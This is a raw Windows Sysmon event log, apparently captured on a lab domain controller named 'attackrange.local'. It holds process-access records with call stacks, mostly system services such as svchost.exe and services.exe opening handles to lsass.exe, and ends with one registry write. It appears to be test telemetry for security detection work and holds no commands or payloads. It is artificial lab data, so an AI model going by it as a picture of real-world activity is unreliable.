\ntdll.dll+51781 10341000x80000000000000001052691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.482{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.482{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0A00-00000000FD01}624700C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0A00-00000000FD01}624712C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.467{5EBD8912-8CBD-6151-0A00-00000000FD01}624292C:\Windows\system32\services.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBD-6151-0A00-00000000FD01}624108C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.451{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.435{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x80000000000000001052665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 